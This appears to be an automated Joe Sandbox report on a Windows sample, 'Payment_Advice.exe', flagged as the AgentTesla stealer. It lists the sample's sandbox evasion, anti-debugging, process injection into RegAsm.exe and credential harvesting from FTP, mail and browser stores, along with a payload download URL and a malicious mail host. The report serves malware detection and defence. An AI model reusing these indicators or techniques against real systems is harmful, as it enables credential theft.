          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect Any.runShow sources
          Source: C:\Users\user\Desktop\Payment_Advice.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
          Source: C:\Users\user\Desktop\Payment_Advice.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: Payment_Advice.exe, 00000001.00000002.29963601470.00000000005FD000.00000004.00000020.sdmpBinary or memory string: `ROGRAM FILES\QEMU-GA\QEMU-GA.EXELY
          Source: Payment_Advice.exe, 00000001.00000002.29963601470.00000000005FD000.00000004.00000020.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEY#
          Source: Payment_Advice.exe, 00000001.00000002.29964237230.00000000022F0000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.34499400097.0000000000EF0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
          Source: Payment_Advice.exe, 00000001.00000002.29964237230.00000000022F0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
          Source: RegAsm.exe, 00000005.00000002.34499400097.0000000000EF0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1USH64EEGGOMV4PCIA9UNMKEAC9U-LIF4WININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
          Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7276Thread sleep time: -2767011611056431s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9947Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\Payment_Advice.exeSystem information queried: ModuleInformationJump to behavior
          Source: Payment_Advice.exe, 00000001.00000002.29963601470.00000000005FD000.00000004.00000020.sdmpBinary or memory string: `rogram Files\Qemu-ga\qemu-ga.exely
          Source: RegAsm.exe, 00000005.00000002.34499400097.0000000000EF0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=https://drive.google.com/uc?export=download&id=1ush64eeGGoMv4pcIA9UNmkEac9u-lIf4wininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
          Source: Payment_Advice.exe, 00000001.00000002.29963601470.00000000005FD000.00000004.00000020.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exey#
          Source: RegAsm.exe, 00000005.00000002.34498399418.0000000000E36000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWe
          Source: Payment_Advice.exe, 00000001.00000002.29964237230.00000000022F0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dll
          Source: RegAsm.exe, 00000005.00000002.34497807320.0000000000DB8000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
          Source: Payment_Advice.exe, 00000001.00000002.29964237230.00000000022F0000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.34499400097.0000000000EF0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

          Anti Debugging:

          barindex
          Hides threads from debuggersShow sources
          Source: C:\Users\user\Desktop\Payment_Advice.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Payment_Advice.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00A86950 LdrInitializeThunk,5_2_00A86950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Writes to foreign memory regionsShow sources
          Source: C:\Users\user\Desktop\Payment_Advice.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B70000Jump to behavior
          Source: C:\Users\user\Desktop\Payment_Advice.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Payment_Advice.exe' Jump to behavior
          Source: RegAsm.exe, 00000005.00000002.34499883773.0000000001350000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: RegAsm.exe, 00000005.00000002.34499883773.0000000001350000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: RegAsm.exe, 00000005.00000002.34499883773.0000000001350000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: RegAsm.exe, 00000005.00000002.34499883773.0000000001350000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected AgentTeslaShow sources
          Source: Yara matchFile source: 00000005.00000002.34508937788.000000001DBF1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7244, type: MEMORYSTR
          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
          Tries to harvest and steal ftp login credentialsShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
          Tries to steal Mail credentials (via file access)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: Yara matchFile source: 00000005.00000002.34508937788.000000001DBF1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7244, type: MEMORYSTR

          Remote Access Functionality:

          barindex
          Yara detected AgentTeslaShow sources
          Source: Yara matchFile source: 00000005.00000002.34508937788.000000001DBF1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7244, type: MEMORYSTR

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management Instrumentation211DLL Side-Loading1Process Injection112Disable or Modify Tools1OS Credential Dumping2Security Software Discovery421Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel21Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion341Credentials in Registry1Process Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection112Security Account ManagerVirtualization/Sandbox Evasion341SMB/Windows Admin SharesData from Local System2Automated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol23Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery115VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Payment_Advice.exe11%ReversingLabsWin32.Trojan.Mucc

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          tccinfaes.com3%VirustotalBrowse
          mail.tccinfaes.com9%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://mail.tccinfaes.com9%VirustotalBrowse
          http://mail.tccinfaes.com100%Avira URL Cloudmalware
          http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
          http://DynDns.comDynDNS0%Avira URL Cloudsafe
          http://cps.letsencrypt.org00%Avira URL Cloudsafe
          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
          http://x1.c.lencr.org/00%Avira URL Cloudsafe
          http://x1.i.lencr.org/00%Avira URL Cloudsafe
          http://tccinfaes.com0%Avira URL Cloudsafe
          http://r3.o.lencr.org00%Avira URL Cloudsafe
          http://ymvmIY.com0%Avira URL Cloudsafe
          http://kwpik2VAR1e4qwGX.org0%Avira URL Cloudsafe
          http://r3.i.lencr.org/0)0%Avira URL Cloudsafe
          http://cps.root-x1.letsencrypt.org00%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          tccinfaes.com
          		188.93.227.195
          		truetrueunknown
          drive.google.com
          		142.250.185.238
          		truefalse
            		high
            googlehosted.l.googleusercontent.com
            		172.217.18.97
            		truefalse
              		high
              mail.tccinfaes.com
              		unknown
              		unknowntrueunknown
              doc-0c-50-docs.googleusercontent.com
              		unknown
              		unknownfalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://doc-0c-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9fjtv4086ilnjilp52k3eek3iqkbfarb/1632745650000/00519186742208262786/*/1ush64eeGGoMv4pcIA9UNmkEac9u-lIf4?e=downloadfalse
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://mail.tccinfaes.comRegAsm.exe, 00000005.00000002.34510158729.000000001DD00000.00000004.00000001.sdmptrue
                  • 9%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
                  http://127.0.0.1:HTTP/1.1RegAsm.exe, 00000005.00000002.34508937788.000000001DBF1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		low
                  http://DynDns.comDynDNSRegAsm.exe, 00000005.00000002.34508937788.000000001DBF1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://doc-0c-50-docs.googleusercontent.com/RegAsm.exe, 00000005.00000003.29940609468.0000000000E47000.00000004.00000001.sdmpfalse
                    		high
                    https://doc-0c-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9fjtv408RegAsm.exe, 00000005.00000003.29936761662.0000000000E4C000.00000004.00000001.sdmpfalse
                      		high
                      http://cps.letsencrypt.org0RegAsm.exe, 00000005.00000002.34510158729.000000001DD00000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haRegAsm.exe, 00000005.00000002.34508937788.000000001DBF1000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://drive.google.com/RegAsm.exe, 00000005.00000002.34497807320.0000000000DB8000.00000004.00000020.sdmpfalse
                        		high
                        http://x1.c.lencr.org/0RegAsm.exe, 00000005.00000002.34497807320.0000000000DB8000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://x1.i.lencr.org/0RegAsm.exe, 00000005.00000002.34497807320.0000000000DB8000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://tccinfaes.comRegAsm.exe, 00000005.00000002.34510158729.000000001DD00000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://r3.o.lencr.org0RegAsm.exe, 00000005.00000002.34510158729.000000001DD00000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://support.google.com/chrome/?p=plugin_flashRegAsm.exe, 00000005.00000002.34509696267.000000001DCA4000.00000004.00000001.sdmpfalse
                          		high
                          http://ymvmIY.comRegAsm.exe, 00000005.00000002.34508937788.000000001DBF1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://kwpik2VAR1e4qwGX.orgRegAsm.exe, 00000005.00000002.34510114513.000000001DCFA000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.34509995210.000000001DCE9000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.34510306374.000000001DD25000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.34508937788.000000001DBF1000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000003.30855905481.000000001C861000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://r3.i.lencr.org/0)RegAsm.exe, 00000005.00000002.34510158729.000000001DD00000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://drive.google.com/%RegAsm.exe, 00000005.00000002.34497807320.0000000000DB8000.00000004.00000020.sdmpfalse
                            		high
                            http://cps.root-x1.letsencrypt.org0RegAsm.exe, 00000005.00000002.34498118472.0000000000DFF000.00000004.00000020.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown

                            Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public

                            IPDomainCountryFlagASNASN NameMalicious
                            188.93.227.195
                            		tccinfaes.comPortugal
                            		8426CLARANET-ASClaraNETLTDGBtrue
                            172.217.18.97
                            		googlehosted.l.googleusercontent.comUnited States
                            		15169GOOGLEUSfalse
                            142.250.185.238
                            		drive.google.comUnited States
                            		15169GOOGLEUSfalse

                            General Information

                            Joe Sandbox Version:33.0.0 White Diamond
                            Analysis ID:1363
                            Start date:27.09.2021
                            Start time:14:25:06
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 12m 43s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:Payment_Advice.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                            Run name:Suspected Instruction Hammering
                            Number of analysed new started processes analysed:8
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.spre.troj.spyw.evad.winEXE@4/1@3/3
                            EGA Information:Failed
                            HDC Information:Failed
                            HCA Information:
                            • Successful, ratio: 96%
                            • Number of executed functions: 98
                            • Number of non-executed functions: 10
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .exe
                            Warnings:
                            Show All
                            • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, WmiPrvSE.exe
                            • Excluded IPs from analysis (whitelisted): 20.82.207.122, 51.105.236.244, 20.82.210.154, 40.112.88.60, 52.113.194.132
                            • Excluded domains from analysis (whitelisted): ecs.office.com, ris-prod.trafficmanager.net, wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, wdcp.microsoft.com, s-0005-office.config.skype.com, wd-prod-cp.trafficmanager.net, arc.msn.com, ecs-office.s-0005.s-msedge.net, ris.api.iris.microsoft.com, wdcpalt.microsoft.com, s-0005.s-msedge.net, wd-prod-cp-eu-west-1-fe.westeurope.cloudapp.azure.com, arc.trafficmanager.net, ecs.office.trafficmanager.net
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            14:27:57API Interceptor2591x Sleep call for process: RegAsm.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            188.93.227.195SHUNYUE 19-EPDA PARTICULAR.exeGet hashmaliciousBrowse
                              FACTURA.exeGet hashmaliciousBrowse
                                FACTURA.exeGet hashmaliciousBrowse
                                  qrDgcsCPZd.exeGet hashmaliciousBrowse
                                    SDtmFGsJHk.exeGet hashmaliciousBrowse
                                      Facturas Pagadas al Vencimiento.exeGet hashmaliciousBrowse
                                        SecuriteInfo.com.Scr.Malcodegdn33.27584.exeGet hashmaliciousBrowse
                                          DHL BL2021764774AWB.docGet hashmaliciousBrowse
                                            Transferencia de borrador.exeGet hashmaliciousBrowse
                                              FACTURA.exeGet hashmaliciousBrowse
                                                SecuriteInfo.com.Scr.Malcodegdn30.24885.exeGet hashmaliciousBrowse
                                                  LKrBXO8nk8.exeGet hashmaliciousBrowse
                                                    CITIBank TT COPY 09016021.docGet hashmaliciousBrowse
                                                      Remesas Aceptadas 14.09.21.exeGet hashmaliciousBrowse
                                                        Remesas Aceptadas 14.09.21.exeGet hashmaliciousBrowse
                                                          Payment Advice.exeGet hashmaliciousBrowse
                                                            INVOICE PI04055.exeGet hashmaliciousBrowse
                                                              PO300005466.exeGet hashmaliciousBrowse
                                                                SecuriteInfo.com.W32.MSIL_Kryptik.FKE.genEldorado.23153.exeGet hashmaliciousBrowse
                                                                  SMK_103.exeGet hashmaliciousBrowse

                                                                    Domains

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                                                    ASN

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    CLARANET-ASClaraNETLTDGBQ7rLYKgThtGet hashmaliciousBrowse
                                                                    • 138.252.40.248
                                                                    xUAaxUb8FSGet hashmaliciousBrowse
                                                                    • 195.102.64.218
                                                                    tI0W00k1vtGet hashmaliciousBrowse
                                                                    • 185.78.207.45
                                                                    Hilix.armGet hashmaliciousBrowse
                                                                    • 185.78.207.42
                                                                    SHUNYUE 19-EPDA PARTICULAR.exeGet hashmaliciousBrowse
                                                                    • 188.93.227.195
                                                                    FACTURA.exeGet hashmaliciousBrowse
                                                                    • 188.93.227.195
                                                                    JuihXmkZGFGet hashmaliciousBrowse
                                                                    • 212.61.181.216
                                                                    2S8N5fDSRsGet hashmaliciousBrowse
                                                                    • 185.78.207.38
                                                                    FACTURA.exeGet hashmaliciousBrowse
                                                                    • 188.93.227.195
                                                                    qrDgcsCPZd.exeGet hashmaliciousBrowse
                                                                    • 188.93.227.195
                                                                    SDtmFGsJHk.exeGet hashmaliciousBrowse
                                                                    • 188.93.227.195
                                                                    Facturas Pagadas al Vencimiento.exeGet hashmaliciousBrowse
                                                                    • 188.93.227.195
                                                                    FACTURA..exeGet hashmaliciousBrowse
                                                                    • 195.22.8.69
